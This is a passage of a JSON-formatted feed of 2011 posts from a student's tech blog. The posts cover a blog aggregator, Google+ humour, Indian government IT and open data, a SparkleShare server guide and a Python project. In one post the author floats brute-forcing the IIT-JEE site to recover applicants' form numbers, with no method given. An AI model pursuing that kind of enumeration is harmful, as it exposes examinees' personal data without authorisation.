aggregated. This way, people can easily follow happenings and blogs at IIT-Roorkee without individually following various blogs. I’ve added a few blogs to it already, including those of Divye Kapoor, Sanath Rath, Wona, Arasu and the likes.\nA complete list of blogs in the planet is available at http:\u002F\u002Fwww.planetaki.com\u002Fiitr\u002Fsubscriptions\u002F\nUpdate: There is also a feature in planetaki to suggest a website for the planet. Unfortunately, you need to be logged in to planetaki (ie create a planet) to suggest a site. In case you are, you can use the suggestions feature to suggest websites.\nTo suggest a blog to add to the list, please use the form below. You can also see the current spreadsheet here :\nLoading...\nYou can also email me for any further queries.\nhttp:\u002F\u002Fplanetaki.com\nhttp:\u002F\u002Fplanetplanet.com\nSpreadsheet of the form above",[],{"slug":3144,"title":3145,"link":3146,"pubDate":3147,"contentSnippet":3148,"tags":3149,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"linus","What if Linus Torvalds designed Google+","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F07\u002F07\u002Flinus\u002F","2011-07-07T00:00:00.000Z","Google’s announced its next big thing, Google+ to take on Facebook left people wondering if the next version would be called Google++. Inspite of all the great work that Vic Gundotra has put into Google+, it still lacks something. The creator of linux, Linus Torvalds. Google+ is as-of-now the social network for tech-geeks who are part of a field trial experiment(monkeys!) on the site. Google+ is still halfway geek, and in my imagination it would have been the ultimate geek power tool if it had been designed by Linus. Unfortunately, he is busy developing the linux kernel (10 million lines, 2% being his), and we would have to suffice with these thoughts:\nOpen Source : Google+ would be open sourced. Anyone could run Google+ on their own servers, and use it to create their own Social Network\nCommand Line : The default Google+ client would run natively on linux\u002Funix but would be ported later to Windows using cygwin.\nDifficulty-of-use : Gone are the click and point days. You’d be required to have absolute mastery over at least 5 different commands before you can even post a single item to your feed.\nFull Control : You will have full control over whatever you post. You can make 4 changes, stage them, take them back, commit 2 of them, edit a post, and recommit before pushing it to the server. However all of this will be stored.\nGit Backend : Both the client and the server will use git as its backend to store history, revisions, links, and circles.\nCircles : would be called trees. And you can tag your trees to take a snapshot of your friends lists at a time.\nBranching : would allow you to create multiple versions of your profile. The default version will be called master, while you can continue your secret development in alpha, staging, beta branches. Circles will automatically be associated with branches and auto-post items.\nMerging : will allow for collaborative posts.\nAfter 12 years of development, Google+ will reach version 2.1\nNo deletions : Everything in history has an importance. You are allowed to use rebase to rewrite history. Beware: use cautiously. Incorrect usage may lead to painfull scenarios.\nA mascot(direwolf ?) would be found for Google+ (probably after it bit Linus in an aquarium)\nFacebook would spend $421m fighting Google+\nThe manual of Google+ would be a labryinth of switches amd command line arguments for all the features that it came with. A user would be expected to read through the entire manual, or at least the first one-third, before being able to do something of use with the service.\nTo block a user, you must enter his id in an ignore file\n3 years hence, the next big thing would be ghub offering a farm-like service to create, host, and customize your own google+ servers.\nNote: Based on the history of linux, and the usability of git.\nAnnouncement\nThe famous announcement of Linux Kernel on the comp.os.minix mailing list is well-known. Slightly re-written, this is how Linus might have announced Google+.\nTags: WeBlog iFest 2011, humour, linux, linus",[],{"slug":3151,"title":3152,"link":3153,"pubDate":3154,"contentSnippet":3155,"tags":3156,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-indian-government-sucks-at-technology","Why Indian Government Sucks at Technology","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F22\u002Fwhy-indian-government-sucks-at-technology\u002F","2011-06-22T00:00:00.000Z","Note: All opinions are mine alone. Please keep your opinions limited to comments.\nThis is in wake of the not-so-anonymous attacks on the nic servers. Apparently a few people had decided to brand their own version of AnonymousIndia and hack into the nic servers. This had been viewed as almost normal in the Indian Media. This is after all something that happens every other day in India. Its just the Indian Army website, nothing that we care about.\nEven though there are excellent tech-security companies in India, we have never developed the right attitude to it. People still think that hacking is fun, and its something that could never happen to them. I’ve never seen people reading the fine print on the thousand social web sites they join now a days. Piracy is rampant in India without any checks and the Indian Government is silent.\nWhy? Because we are used to it. It has always happened this way. Information leaks have been a major part of the Indian history and would remain so unless we realize that the more we embrace technology; the more we become dependent on it, it is coming one step closer to the edge.\nA recent tweet by @divyekapoor reminded me of the AADHAR project, which aims to give out a unique identification number to each Indian citizen.\nHacks like these ensure that I will resist giving my Biometrics to the UID project till they've suffered atleast 4 security breaches.\n— Divye Kapoor (@divyekapoor) June 18, 2011\n\n\n\n\nI read out the UIDAI docs and it tells us that it would  “prescribe protocols to ensure the confidentiality, privacy and security  of data”, and “follow the confidentiality, privacy and security  protocols prescribed by the UIDAI”. A search on the uidai.gov.in website gives out a little detail :\nThe UID database will be guarded both physically and electronically by a few select individuals with high clearance. It will not be available even for many members of the UID staff and will be secured with the best encryption, and in a highly secure data vault. All access details will be properly logged.\nThis is the most that they have to say on the subject. If that makes you feel safe, remember the earlier fiasco involving the security of the EVM machines. Ultimately I’m with the government on that one, however, since a user had to have physical access to actually do any harm to the machine. But it was possible and Election Council kept denying it. As it happened, it seems that all our govt. agencies are probably trying more to hide their technical requirements, rather than make them open.\nSo why is this approach taken in India? Beauracracy? probably yes. But I feel that unless the technocrats rise up and actually enter the Indian Govt. technical agencies (such as NIC), nothing would change. For instance I find that almost everything that Indian government does is tailored specifically for Windows. There is no reason to plaster “Works best in Internet Explorer 6 at 1024x768” in all your web sites, we already know how much the Indian government. So much so that they get it pre-installed everywhere, even in government schools, and technical institutions.\nYet there is a small faction that is working tirelessly in the other direction as well. For instance the Sakshat project has been under the news recently as well. It would ship with a version of android (which one?) with wi-fi, bluetooth and other frills. However the project has been known for shadowing and changing its details at each conference it is unvealed, so beware. It may suddenly change from an android to a Windows phone in the next one. Or maybe a blade server (speaking of which, the uid project ordered 68 of them.\nI’ve worked a little bit on online Geo-Mapping tools earlier (mostly using Google Maps API). However, I wanted some accurate data for one of my projects (such as geographical boundaries). Other sources for this data are not as reliable, and I found the bhuvan online tool to be extremely accurate in this respect. If you’ve forgotten Bhuvan, its the Indian version of Google Maps. It was supposed to be the tool for mapping things. Unfortunately, as things have planned out, most of its claims have been rubbished (like 10m resolution power), or made null due to the extremely slow servers it uses(and it was supposedly optimized for low bandwidths). If you’re plannig to fight google, you’ve to step up your game. Try checking out the horrible design of the Bhuvan website. Leaving aside its horrible interface, Windows only support (.net), installation of additional plugins to just run it, and , it had brilliant geographical data(collected via various government agencies). However as it turns out, this data is not public. Why? It seems that ISRO plans to sell this data to people interested in using it. Wow! So a public funded agency decides to make money from the development done using our money. It’s been close to 3 years since its launch. And I’d be highly interested in knowing where it managed to sell this data.\nIn all fairness, though they’ve said that they would only sell the high resolution data, while making the general data freely available to users. But I don’t see fair unless its own my system, damn it. If by free you mean I’d have to open your website each time I need to find a village, it seems we have different thoughts about the word’s usage. Oh, and there’s a link on the website’s home page to a section called APIs which redirects to the Bhuvan Software download page, where guess what, there are no APIs at all. I managed to dig a few links and download two versions of their APIs, which seem to be downloaded copies of the documentation of the open layer javascript protocol they are using for mapping in the browser. So the data is available, it seems. But they’re forgetting to mention where.\nSeriously, people wake up. This is the 21st century, and the most hyped buzz word today is open-source(well, after cloud). And if you really want to work on things, make them open source. Not just the technology, but the data as well. Becauase open data is essential to growth and planning of a nation, as Hans Rosling keeps on reminding us. Meanwhile, DRDO decides to go ahead and develop its own operating system. Why? Because it will be closed-source and will be much more secure than any of the variants of linux.  Or so they think.\nThe Informatics center still runs thousands of its websites in ASP (not even ASP.net), and this fact alone is enough to scare me off. With major corporations suffering from data leakage (Sony, Gawker) where user access was compromised, it is high time that the Indian Govt. someone realizes that you cannot secure your systems by locking them in a vault. These companies did the same, and look at the result.\nEven the American Government has come up with an open-source initiative. Their website data.gov is a collection of applications, apis and raw data collected by various government agencies. And to top it all, the US government invited the top application developers from their platform at data.gov to the White House, hailing them as unsung heroes of the new age. If you’re interested in reading more and taking a stand for the open data democracy, take a look at this whitepaper by the Netherlands Organisation for Applied Scientific Research for a keen review of what are the major barriers to a government from sharing its data. Also go ahead and donate some money to wikileaks, while you’re at it.\nAnd where is the Indian government at this? Not very far behind, but lagging nonetheless. Let us take the prime example of the decennial festival that is the Census. Apparently all census data is free (as it should be). But there is a minor caveat. The entire site is made in asp (which doesn’t really matter, I just don’t like it), and all the data (tables, figures, maps) are in pdf format. So, you can access the data personally, on a single page. Page by page, it might be thousands of documents, figures, charts, and what not. But since it is all in pdf format, it is locked down. You could parse it by some means, but the data is supposed to be free, in the best format possible so that everyone can use it easily. And the geographical boundary data(which I mentioned earlier) is also available in the census results, but only via a java applet, which does not allow access to the raw data, that an application developer would need. Am I expected to file an RTI application, just to know the exact boundaries of my state. Or perhaps, I should just pay ISRO and be done with it.\nAs an additional benifit easter egg, the census website states the following:\nThe Census of India or any data or content providers shall not be liable for any errors in the content, or for any actions taken in reliance thereon.\nAll efforts have been made to ensure the accuracy and currency of the content on this website. However, users are requested to verify\u002Fcheck any information with us to obtain appropriate professional advice before acting on the information provided in the website. In no event will the Government or office of the Registrar General India be liable for any expense, loss or damage including, without limitation, indirect or consequential loss or damage, or any expense, loss or damage whatsoever arising from use, or loss of use, of data, arising out of or in connection with the use of this website.\nAnd lastly, as an analogue to the excellent Right To Information Act, there must be an analogous Right To Technology act. It should empower each and every person in the country to know what is happening behind the scenes. We demand total transparency in technological decisions. Not just the passing of tenders, but the decisions which involve actual technological development. For. eg at the CDAC website, the government offers a trial version of various forensic tools they’ve developed. Why aren’t they open sourced? Why were they writen using a particular language? If RTI fought off the beauracracy, this could help us eliminate the old technocrat thinking from the India Govt. If we are able to get the right data, in the right format, thousands of application developers across the world are willing to create great ways to access that data. Data by itself is not enough, however. It must be met with an equal resolve from people to make it accesible, and usable.\nThis could be a turning point in the Indian Govt. Either they could continue what they’ve been doing and meet their doom in a major state sponsored hack crippling the entire nation. Or they could take a step back, and do things the right way.\nAnd what is the right way?\n\nUpdate :According to an article in the Economic Times, there is a working draft for bringing Open-Source in e-governence systems under work.",[],{"slug":3158,"title":3159,"link":3160,"pubDate":3161,"contentSnippet":3162,"tags":3163,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"ubuntu-gitolite-sparkleshare-install","Setting Up Sparkleshare Server using Gitolite and Ubuntu","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F20\u002Fubuntu-gitolite-sparkleshare-install\u002F","2011-06-20T00:00:00.000Z","Introduction\nEverybody seems to be all about open-source cloud-backup and sync solutions now-a-days. The hype is all around the cloud, they say. However cloud is just a stupid concept for sales people, that I prefer to avoid. However people are coming up with all kinds of crazy ideas to create their own dropbox clones. A few similar services include SpiderOak, Ubuntu One, Sugar Sync, and Wuala. However, not all of them are compatible with Linux (unlike Dropbox, which is).\nComparision\nSo here’s a minor comparision of some famous clients :\nDropbox : Cuurent Leader, offers everything from sync, collaboration, sharing, public links, upgradable storage and is the de-facto client for synchonization tasks. However there have been a few issues regarding its privacy issues recently.\nUbuntu One : Ubuntu One is Ubuntu’s fighting offering to Dropbox. Its excellent, with an open source api, that allows one to create applications for the Ubuntu One platform very easily. However, the server-side of Ubuntu-One is still closed source, which means you cannot setup it on your own servers (similar to dropbox). Canonical has hinted that it might be made open source in the future.\nWuala : is a file-backup network where you trade your own hard disk space for extra storage. This allows wuala to offer higher space at a much lower offering rate.\nSpiderOak : I’m using this currently along with SparkleShare and Dropbox. It has proven to be very robust, allowing me to backup almost anything to its servers. I’ve got a 5GB account which is more than enough for me till now. Its very powerful interface allows one to control each and every aspect of your backup\u002Fsync\u002Fshare process. Also it boasts of a true-privacy feature, meaning that all your documents are encrypted before being sent to dropbox. It also means that you can only reset your password from your own computer.\nTake a look at http:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FComparison_of_file_synchronization_software for a better comparision of several other services as well.\nInstalling SparkleShare using gitolite\nThis is a simple tutorial on running your own sparkleshare server as a hosting server. Note, that this implementation should ideally be built as a separate module for sparkleshare-admin, which is still under works as of writing. Sparkleshare’s basic concept is to use git repositories as storage places. In case you don’t know what git is, I’d recommend this guide for more details. In short it is an awesome revisioning system for use by anyone managing code(or content for that matter as well). It allows you to keep track of what is happening with your directory, and revert back to earlier versions (among several other things).\nSparkleshare asks you to setup a git-server somewhere and use it as a remote storage system. It offers out of the box support for git hosting providers github and gitorious. It also allows you to add your own custom servers as well. Enough description, lets get down to some work :\nSetup Gitolite\nAssumptions :\nYou are running a stable Linux OS (Fedore\u002FDebian\u002FUbuntu etc)\nuser@host1 is your own computer\nuser2@host2 is the primary computer where you intend to start the server\nThe gitolite username is sparkle\nSetup WildRepos\nEdit the file and add the following lines at the bottom :\nNow we need a method to allow anyone to create git repositories on the server. This is accomplished via Gitolite’s very powerful Wildcard Repositories feature.\nSetup Client\nNow, your server is all setup, but there is still stuff to be done :\nWhen you run sparkleshare for the first time, it asks you for a few things, including your email-id. Fill in those details, but do not setup your repository yet. You need to first allow your sparkleshare account access to gitolite.\nNow if all goes well, you’d have allowed acess to gitolite for this user. We now need to re-run the sparkeshare setup again. Find it in your Applications. Now when it asks you to fill a repository path, type in the following details :\nPlease take care of the slashes, otherwise sparkleshare fails to recognize it as a valid ssh address. Instead of fh73ah, you can type any alphanumeric string of 6 characters. You can change this in your gitolite-admin conf.\nAfter your first sync is complete (in which it tries to clone your existing repo, and gitolite creates it for you), you can find a folder called Sparkleshare in your home directory. This contains all your personal sparkleshares, including your first one. Put in any content inside the fh73ah and it would be automatically synchronized.\nConclusion\nThe best thing about sparkleshare is that you can use your own server under your own rules. I’ve synced 143GB via Sparkleshare so far, and it has been working excellent so far. It takes a complete history, takes care of moves (git) and allows you to keeo huge backups easily. Just drag and drop, and forget. If you want to sync already existing folders, just drag them , and alt+drop them inside the shared folder. This way a sym-link gets created, which refers to the original directory. The sparkleshare folder on my computer takes up hardly a few kbs, but syncs worth 150gb.\nThis method is only useful if you need to manage multiple accounts on the same host. Otherwise, you can refer to this excellent post on webupd8 for instructions to install it to a single user system (which does not involve the complication of gitolite). I’ve been looking for some gitolite management scripts (I’ve written a few as well) which would allow one to easily add their own ssh keys. This way anyone can easily setup accounts on the system. However, as of now, this is just a dream.",[],{"slug":3165,"title":3166,"link":3167,"pubDate":3168,"contentSnippet":3169,"tags":3170,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"new-website-captnemo-in","New Website [ CaptNemo.in]","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F13\u002Fnew-website-captnemo-in\u002F","2011-06-13T00:00:00.000Z","Just if someone's still following this blog around(don't, its already dead).\r\n\r\n \r\n\r\nI've moved over to my new website (http:\u002F\u002Fwww.captnemo.in). Its running from github and will be a perfectly static website where the power of my awesome magical skills shall finally be revealed.\r\n\r\nJust joking. Its hosted on the awesome servers of github and you might want to check it out..",[],{"slug":3172,"title":3173,"link":3174,"pubDate":3175,"contentSnippet":3176,"tags":3177,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"iit-jee","IIT-JEE 2011 Results","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F01\u002Fiit-jee\u002F","2011-06-01T00:00:00.000Z","I worked out the entire IIT-JEE 2011 results and the end result is available here. I’ve intentionally removed the Application Form Number (partially) in the results, so that it may not be misused. I’m thinking of trying a full-scale birthday permutation attempt on the JEE site for the Application Form. What do you think? Will it be worth it?",[],{"slug":3179,"title":3180,"link":3181,"pubDate":3182,"contentSnippet":3183,"tags":3184,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"learning-python","Learning Python, PyGTK","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F05\u002F16\u002Flearning-python\u002F","2011-05-16T00:00:00.000Z","I had been meaning to learn either Python or Ruby for a long time but had been unable to decide. I had a basic understanding of both of these, but I never had the chance to build an entire application in either. And I’m not talking about using Django or Ruby on Rails (which are both brilliant), but building a desktop application using GTK.\nThe application I was first aiming for was a P2P sharing client which would be completely decentralized and offer several special features, such as :\nNAT Transversal using UDP Hole Punching\nHTTP based file sharing as well (so that people can install their clients, and still use IDM for downloading stuff)\nClient discovery & routing behind firewalls along the lines of Skype (using supernodes)\nHowever my dreams were shattered by the first point itself, being the difficulty of NAT Transversals. Further ahead was the question of networking as well, which could have potentially driven me nuts. I worked a bit on it, using STUN, twisted, but gave up on it soon as being unfeasable as a learning project.\nThe next idea came to me when I got tired of downloading stuff using axel from the command line and started itching for something similar to Internet Download Manger for Ubuntu. The closest thing to a download manager on Ubuntu is FatRat and is something I really don’t like. It is based on Qt and prouds on working as a front-end for several file-sharing websites as well. What I needed was in fact a fast download manager, which keeps tracks of what I download, and does not require keeping a terminal open all the time.\nI found GwGet, which occassionaly looks much better in the source version than in the one from the Ubuntu Repositories. I really liked this one, except for the fact that it was made using C++, and used single threaded downloads (like wget). As a result it was quite slow, and not upto my needs.\nThat was when I thought of the idea of creating a download manger using [GTK][gtk] + Python\u002FRuby. I looked around for axel ports in Python\u002FRuby and found PyAxel, which beat axel in some of my benchmarks (after this patch). For the past two days, I have been working on PyGTK, Glade, Anjuta and several other IDEs, none of them to my liking. I really prefer Vim :)\nSo far, the work on PGet has been minimal. I’ve worked out threading, and little parts of GUI which were stripped from GwGet. As of now, it is still under works, but I am hoping for a release real soon. After all, it is not for nothing that they call Python a dynamic langugae\nFor more details, please go the PGet project page on Github. I will be posting further updates over there.\nIn case someone is following this blog, you can view the source for this website at github and maybe even fork it!",[],{"slug":3186,"title":3187,"link":3188,"pubDate":3189,"contentSnippet":3190,"tags":3191,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"puzzles","Puzzles, Life & Other Things","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F30\u002Fpuzzles\u002F","2011-04-30T00:00:00.000Z","Since I’ve already decided to make this my newer blog, why not just continue in the same spirit and write a little of the events of my highly boring, lazy life. For one, I was part of the SDSLabs 1st yearly trip to Robber’s Caves which was highly enthralling. We enjoyed a lot, and as a bonus I learned to play Mafia. Somehow the concept of not-knowing and yet trying to deduce out a solution in Mafia seems quite interesting for a Party game to me. Among other things, my sister got me a new Rubik Cube (which should be my 6th or 7th I guess), and I’ve been practising quite a lot (to the dismay of my friends and teachers), My timings have not been upto the mark as they were last year, but I’ve been improving and I average around 80 seconds per solve. I’ve been focusing on learning the entire Fridrich, and try to learn 2-3 moves per day.\nI also spent some time reading a brilliant new fantasy series called “The Kingkiller Chronicles” by Patrick Rothfuss. It is a brilliant new debut series in fantasy fiction, and already has 2 books out from its planned trilogy : The name of the Wind, and The Wise Man’s Fear. The series is highly praised, and you were to believe me, one of the best pieces of Fantasy ever written. But it is not the fantasy about this book that makes it so great. Its the general themes of love, tragedy, enemity, and knowledge that make it brilliant. Kvothe, the protagonist of the series is a charming character who is telling the story of his life to the Chronicler. Enough on the book, just go ahead and read it!\nOh, and I’ve got a RSS feed for blog using Jekyll already. Its available [here] (\u002Fatom.xml)",[],{"slug":3193,"title":3194,"link":3195,"pubDate":3196,"contentSnippet":3197,"tags":3198,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"game-of-thrones","Game Of Thrones","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F19\u002Fgame-of-thrones\u002F","2011-04-19T00:00:00.000Z","For the uninitiated, Game Of Thrones is a high budget fantasy TV series currently being screened on HBO. It is based on George R.R Martin’s epic fantasy, A Song Of Fire & Ice, book one of the Game Of Thrones series. \nI had started reading the book a few weeks ago (not knowing then about the TV series), but never quite got the time. However after the highly promoted Trailer, and the absolutely brilliant episode 1, I’ve picked up the book once again.\nI’ve decided to keep myself aloof from all the spoilers, and read the book along with the series. This means that I will be finishing the book in a very long time, but also that I will be able to get a much better insight into what is going on the series. For eg there are very many characters in the TV series, which are not yet introduced, and it was interesting to see them come upfront in the book.\nIs anyone else reading the book for the first time along with the TV series ?\nBelow is the ground from the book that each episode contains. I will continue to update this as the series goes ahead :\nEpisode :\nChapters 1-8\nChapters 9-17\nChapters 18-24*\nChapters 25-29\nChapters 30-35\n* Only half of the chapter is present in the respective episode.\nLet me know what you think of Game Of Thrones in the comments…",[],{"slug":3200,"title":3201,"link":3202,"pubDate":3203,"contentSnippet":3204,"tags":3205,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"introduction","Introduction","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F10\u002Fintroduction\u002F","2011-04-10T00:00:00.000Z","Welcome to my github pages. This will be my personal code blog site, or something of that sort. I will soon be transitioning this site to Jekyll for easier publishing and maybe move away from wordpress. (Done)\nI am a proficient coder in PHP, working on various internal projects at SDSLabs.\nHere is my current setup :\nDell Inspiron 1545\nT-6400 Intel Core 2 Duo\nUbuntu Oneric Ocelot 11.10 (Default Primary OS)\nElementary OS (Under Testing) Will be moving to Gnome Shell soon\nSamurai WTF, Backtrack 5 for pen-tests\nMoved from Windows after remaining a staunch supporter for 5 years",[],{"slug":3207,"title":3208,"link":3209,"pubDate":3210,"contentSnippet":3211,"tags":3212,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"run-apt-add-repo-behind-firewall","How to run apt-add-repository behind firewalls (#iitr)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F01\u002Frun-apt-add-repo-behind-firewall\u002F","2011-04-01T00:00:00.000Z","Copied from OMGUbuntu\nPress Alt-F2 and type “gksu gedit \u002Fusr\u002Flib\u002Fpython2.6\u002Fdist-packages\u002Fsoftwareproperties\u002Fppa.py”\nFind line 88, change “keyserver.ubuntu.com” to “hkp:\u002F\u002Fkeyserver.ubuntu.com:80”\nSave and close\nNote that this is the default setting in Ubuntu Natty Narwhal (11.04), and was only applicable for Maverick or older versions.",[],{"slug":3214,"title":3215,"link":3216,"pubDate":3217,"contentSnippet":3218,"tags":3219,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"wona-review","Wona Oct-Dec '10 Review","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F03\u002F17\u002Fwona-review\u002F","2011-03-17T00:00:00.000Z","Download the issue on the WONA\narchive website.\n\nNote about Archival: This post used to live on the (now-dead) piratecoders.co.cc website. I’ve moved it here for archival’s sake.\nThe latest issue of WONA turned up 3 months late at my doorstep. Other\nthan the fact that it was missing an apology letter for this lateness,\nit was a good step in the forward direction by WONA in general. Once you\ntake aside the pleasantries, and the sarcasm, I felt that WONA was, on a\ngeneral scale, surpassing what it had been doing till now, and moving\ntowards a better (and hopefully a quicker) issue. However, this one was\ndefinately not the one to be labelled perfect. So here comes the review\n:\nCover : Let’s start with the cover. Not much to write about it,\nother than the fact that it took me quite some time to figure out what\nwas Maradone doing on it. Nice work in putting up the WONA logo (which\nI’m genuinely fond of). Nice choice of color scheme, and over-all good\nwork.\nEditorial : The magazine starts at a good note with the editorial\npromising us what’s inside in a nutshell. This was the best write-up of\nissue for me, and did its job well. I was enticed into reading further,\nand got a gist of what was about to come.\nAlmost Famous : Almost Famous has quite a history of its own, and is\none column that every person who lays his hands on WONA definately\nreads. This time around, you held out Jan Flaming for me. As for the\ninterview itself, it was clearly written, had some nice questions, some\nimaginary answers, and overall does quite well for the reader. On a\nsecond take, this was probably the reason it ends up on the first page\nthis time.\nMurphy’s Strip : Alas if Murphy had been here, he might have taken a\nshot or two at you. How about : “Any comic that can go wrong will go\nwrong.” Or maybe “If Vela could draw stupid sketches, he would.” Still,\nnice concept, bad execution. Could have been better, definately,\nespecially with regards to sketching. Still 42 times better than the\nother strip.\nNewsNotes : were 4 pages of news, which arrived 3 months too late.\nNobody remembers any of these incidences happening, let alone being part\nof them. PAN-IIT was way bigger than your coverage, and deserved a bit\nmore. Rest all the newsnotes were in a bit, exactly what they were\nsupposed to be : News, without any sarcasm or humour. However I’m\nheavily against the use of one and half pages to glorify pages. I know\nhow costly it is to push each page into the magazine, but please don’t\nfill it with something that no one bothers to read. Medal winners,\nplease don’t mind but the two tables were a waste of space, if not\nsomething else. Or else the nine people from WONA’s news section could\nnot find enough news. Anyone could have gotten these lists from the\nSports Council a day after the event ceremonies. Give me something\nbetter.\nFace-Off : was usual stuff. Nice choice of topic, nicely edited,\nwith some actual points being thrown around, this turned out fine.\nBig Story (Devil Wears Prada) : In spite of my initial skeptism\nabout the story (I knew about it before the issue came out), I really\nliked it. This article goes ahead and proves that what you write on is\nunimportant (or at least less so) as long as you write it well. In a\nworld of geeks, bringing out a cover story on fashion is really a bold\nmove, and I must applaud you for having the guts to do so. The article\nwas well written, and a joy to read. However I’d come to hear, from\nseveral sources, that people quoted in the article did not in fact give\none to WONA. Please take care not to make up stuff next time. You’re a\nnews mag, stick to the status quo, please.\nVerbatim : WONA gets its hands on the most respected professor on on\nour campus, and does quite a good job of it as well. Nice questions,\ninteresting answers make up a good read. In fact, the only negative\npoint of the article was its placement.\nWonaLeaks : This was the article that forced me to write this\nreview. If it was an attempt at humour, it failed badly. As an attempt\nto mix news and wonaspeek, it fails even badly. Mixing kangaroos, indian\ncricket team, koala bears and a state prosecutor is definately not the\nrecipe for sucess. It might work in movies (Spaceman + Potato Head +\nZombie Dolls + Cowboy + Alien with 3 eyes = Oscar), but definately not\non paper. Nobody remembers the event the article talks about. Its\nrelation to wikileaks is not enough to demand a WonaLeaks icon. I shall\nforever remember this as the worst of writing, and imagination that ever\ncame out of wona.\nTech-ila Shots : The in house tech article arrives a few months\nlate. (Google just released Cr-48). I would have personally liked to see\nsomething else here (iPhone vs Android, iPhone 5, Ubuntu vs Windows\netc). But as it was, the article was well thought of, and did exactly\nwhat it planned to. It could have done with a bit of pruning though, and\nthe author might have liked to tell us a bit more about the OS itself\n(it only mentions the fact that its web based, comes as pre-installed,\nwill not run intensive applications).\nRandom Ed : I’m not sure if it really is an editorial, but I’ll\nstick with the title. Nicely written in short. However the purpose and\nintent of such an article is lost in the true random nature of the\narticle itself. The article fails to reach a resolution, and delievers\nnothing at all. Indeed most of the thoughts mentioned in the article,\nmust have sprung to every person’s brain at some time or another. Then\nwhat’s the need of this article? Is it philosophy that Wona’s trying to\ndive into? Or perhaps its just a conspiracy to get all students in the\ncampus to think more randomly, leading to a decrease in entropy of the\nthoughts of the profs, and as a consequence, simpler question papers.\n(For the skeptics, something similar has already happened, and our\nthought patterns are involed in the entropy of a system.)\nEthics : was actually the cover story (which one comes to know only\nafter re-reading the cover). The author is unclear of the intent of the\narticle, and it steers in various directions. I’m still unsure as to\nwhere it ends, and whether Arasu’s mumblings (Another Brick in the Wall)\nare part of it. One might raise question as to the relevance of the last\nsection itself, but this article had its moments as well. In short, nice\nconcept, nice writing, but could have done with a bit of restructuring.\nCanine Strip : Another page wasted. The time spent by the sketcher\ncould so easily have been devoted on bettering the other one. Needless\nto say, wona seems to be lacking in people who actually write, and the\nit results in a page filled with a stupid comic about dogs taking over\nthe campus. Seriously, get some creativity. Even zombies would have done\nbetter.\nWORC : Good decision in continuing this column. I was afraid it\nmight get scrapped along with Agony Aunt(which was a very good\ndecision). I can just hope that you actually asked some persons to\ncreate those pie charts. Dr. Sinhval seems to have taken his time in\nanswering the questions, and his reply is full of facts, explanations,\nand ideas. Nice work by the ed team here, definitely.\nOther than the articles there are a few more areas of interest I would\nlike to point out.\nDesign: Seriously, have you people ever heard of vector graphics.\nYour designers really need a course on making scalable graphics. The\nneed for Darth Vader to illustrate an article is fine, as long as you\nhave a big enough image to fit. Trying to scale a 400×300 jpg into a\npage will not do. Even the cafe de norma ad was pixellated. The girl\nwearing Prada proves that it was possible to pring clearer graphics .\nHowever on the very next page, there’s an overdose of black. Similarly\npixellated were most of the other pics on the mag. The 3 monkeys\nillustrating the second last page could have been something better. The\nessence of the German flag was lost in black & white(Almost Famous) .\nAnd just so you know that everyone noticed , dark colored pics in the\nbackground make text unreadable (Chrome OS).\nAds : I don’t know the reasons behind it, but from a reader’s point\nof view, an issue with only 3 ads is really awesome. Especially once you\ncompare it with Kshitiz’s latest issue. I know it must have been really\nhard to cover the costs, and manage the finances and all that. But folks\nover here are smiling for your hard work. You finally published it\n(albeit 3 months late), and that’s what matters.\nPlacement : could have been better. Some articles should have gotton\nmore coverage than given. Perhaps you should think of making Tech-ila\nbigger. I would’nt have minded the least if Verbatim had gotten a bit\nlarger. The ethics article was divided into portions, I couldn’t\nunderstand, and might have done with fewer sections.\nCover : A little side note as to why the article change from the\ncover to the article itself. Isn’t the cover supposed to hold titles as\nwell. On second thoughts, I might be wrong to suggest your current\nlayout, but can you just put up page numbers! They would surely help.\nAnd finally a note from my side : Wona is an excellent magazine. Despite\nit having a status quo of its own on its supposed unreadability without\nan excellent understanding of wona’s inner sanctum, I believe that the\nmagazine is an essential part of life at iitr. It is one of the few\nsections in our campus, whose work is actually a part of our daily life.\nThanks to the entire team for working so hard on this issue.\nThis review is my way of letting you know that there are people who care\nabout what you write. There are people who wait for the issue, and who\nare determined to do so till they pass out. Consider it a friendly nudge\nand a little feedback from my side. Its up to you decide what your mag\nis after all. With hopes that the next issue is even better than this\none\nUpdate: Friends over at wona inform me that the delay in the mag\nwas due to an issue on the administration’s side rather than wona’s\nside. If that was the case, the blame’s partially on your staff advisors\n(spelled incorrectly in the mag’s first page) : Dr. M.J. Nigam, and Dr.\nB.R.Gurjar. I’m still not sympathatic to the excuse given entirely, and\nbelieve that it might have come out a bit more sooner with some more\neffort on wona’s side.",[],{"slug":3221,"title":3222,"link":3223,"pubDate":3224,"contentSnippet":3225,"tags":3226,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"what-the-hell-is-this","Random Stray 